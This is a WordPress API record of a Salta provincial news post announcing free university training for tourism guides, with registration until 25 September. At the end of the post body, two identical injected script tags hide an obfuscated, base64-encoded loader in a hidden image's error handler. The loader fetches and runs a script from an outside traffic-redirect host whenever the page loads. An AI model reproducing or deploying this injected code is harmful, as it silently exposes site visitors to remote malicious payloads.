{"id":4405,"date":"2024-09-12T10:57:40","date_gmt":"2024-09-12T13:57:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4405"},"modified":"2025-08-13T23:48:43","modified_gmt":"2025-08-14T02:48:43","slug":"inscripciones-abiertas-para-el-ciclo-complementario-de-formacion-dirigido-a-guias-idoneos-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4405","title":{"rendered":"Inscripciones abiertas para el ciclo complementario de formaci\u00f3n dirigido a gu\u00edas id\u00f3neos de turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><em><strong>El Ministerio de Turismo y Deportes y la UPATECO lanzaron esta propuesta pedag\u00f3gica de formaci\u00f3n profesional para inscriptos en el Registro \u00danico de Gu\u00edas de la Provincia. La inscripci\u00f3n es gratuita y se encuentra habilitada en https:\/\/forms.gle\/Mbta1T3zSGyTTYy68.<\/strong><\/em><\/h4>\n\n\n\n<p>Con el objetivo de trabajar de forma articulada para contribuir al desarrollo tur\u00edstico de la provincia a trav\u00e9s de la formaci\u00f3n profesional de gu\u00edas con extensa trayectoria en territorio, el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, suscribi\u00f3 un convenio marco de colaboraci\u00f3n mutua con el rector de la Universidad Provincial de Administraci\u00f3n, Tecnolog\u00edas y Oficios,&nbsp;<strong>Carlos Morello<\/strong>.<\/p>\n\n\n\n<p>En el marco de este acuerdo firmado se present\u00f3 el Ciclo Complementario para gu\u00edas id\u00f3neos inscriptos en el Registro \u00danico de Gu\u00edas de la Provincia, que tiene como objetivo que la formaci\u00f3n t\u00e9cnica responda a las nuevas demandas y necesidades formativas de los gu\u00edas id\u00f3neos de turismo, en algunos casos con 30 a\u00f1os de trabajo.<\/p>\n\n\n\n<p>\u201cEs un honor para nosotros estar hoy anunciando el lanzamiento de este ciclo complementario que dar\u00e1 la posibilidad a los 550 gu\u00edas id\u00f3neos que tenemos en la Provincia de tener un t\u00edtulo universitario a trav\u00e9s de una formaci\u00f3n virtual totalmente pensando en ellos\u201d, destac\u00f3 el Ministro de Turismo y Deportes.<\/p>\n\n\n\n<p>Asimismo Pe\u00f1a agradeci\u00f3 \u201ca la UPATECO y a todo el equipo de trabajo que hizo realidad una tarea pendiente que ten\u00edamos desde el Gobierno de la Provincia con todos los gu\u00edas id\u00f3neos que cumplen un rol fundamental para el sector tur\u00edstico de Salta\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13880-inscripciones-abiertas-para-el-ciclo-complementario-de-formacion-dirigido-a-guias-idoneos-de-turismo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13880-inscripciones-abiertas-para-el-ciclo-complementario-de-formacion-dirigido-a-guias-idoneos-de-turismo.jpg\" alt=\"Inscripciones abiertas para el ciclo complementario de formaci\u00f3n dirigido a gu\u00edas id\u00f3neos de turismo.\"\/><\/a><\/figure>\n\n\n\n<p>Por su parte el Rector de la UPATECO manifest\u00f3 \u201ceste Ciclo Complementario surgi\u00f3 de una inquietud que nos plante\u00f3 el Ministro Pe\u00f1a y desde nuestro lado, a trav\u00e9s de la formaci\u00f3n acad\u00e9mica gratuita, &nbsp;es un orgullo poder potenciar y ser parte del crecimiento de una de las industrias m\u00e1s importante de nuestra provincia, como lo es el turismo\u201d.<\/p>\n\n\n\n<p>En tanto, la presidente del C\u00edrculo de Gu\u00edas de Salta, Anal\u00eda P\u00e9rez dijo \u201ceste es un gran paso que estamos dando para todos los gu\u00edas id\u00f3neos de turismo de la Provincia de Salta, y es por eso que queremos invitar a todos nuestros colegas a que se sumen y no pierdan esta oportunidad \u00fanica que nos est\u00e1 dando el Ministerio de Turismo y la UPATECO, con quienes estamos muy agradecidos\u201d.<\/p>\n\n\n\n<p>Esta nueva propuesta pedag\u00f3gica &nbsp;tendr\u00e1 una duraci\u00f3n de cuatro meses y presentar\u00e1 un car\u00e1cter virtual (sincr\u00f3nico y asincr\u00f3nico) en el dictado de sus m\u00f3dulos, permitiendo a &nbsp;los gu\u00edas acceder a los contenidos y realizar sus tareas en cualquier momento, desde cualquier lugar adapt\u00e1ndose a los horarios y compromisos laborales. Esta modalidad ofrecer\u00e1 flexibilidad y acceso a los recursos acad\u00e9micos disponibles mediante una plataforma de aprendizaje virtual.<\/p>\n\n\n\n<p>Las inscripciones son gratuitas y se encuentran habilitadas, hasta el 25 de septiembre, ingresando al siguiente link:&nbsp;<a href=\"https:\/\/forms.gle\/Mbta1T3zSGyTTYy68\">https:\/\/forms.gle\/Mbta1T3zSGyTTYy68<\/a>.<\/p>\n\n\n\n<p>En la oportunidad estuvieron presentes la secretaria de Turismo, Nadia Loza, y la presidente de la Asociaci\u00f3n Salte\u00f1a de Agencias de Turismo, L\u00eda Rivella.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Inscripciones abiertas para el ciclo complementario de formaci\u00f3n dirigido a gu\u00edas id\u00f3neos de turismo\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/e7K3kNsXEGI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes y la UPATECO lanzaron esta propuesta pedag\u00f3gica de formaci\u00f3n profesional para inscriptos en el Registro \u00danico de Gu\u00edas de la Provincia. La inscripci\u00f3n es gratuita y se encuentra habilitada en https:\/\/forms.gle\/Mbta1T3zSGyTTYy68. Con el objetivo de trabajar de forma articulada para contribuir al desarrollo tur\u00edstico de la provincia a trav\u00e9s [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4406,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,15],"tags":[],"class_list":{"0":"post-4405","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4405"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4405"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4405\/revisions"}],"predecessor-version":[{"id":6683,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4405\/revisions\/6683"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4406"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4405"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}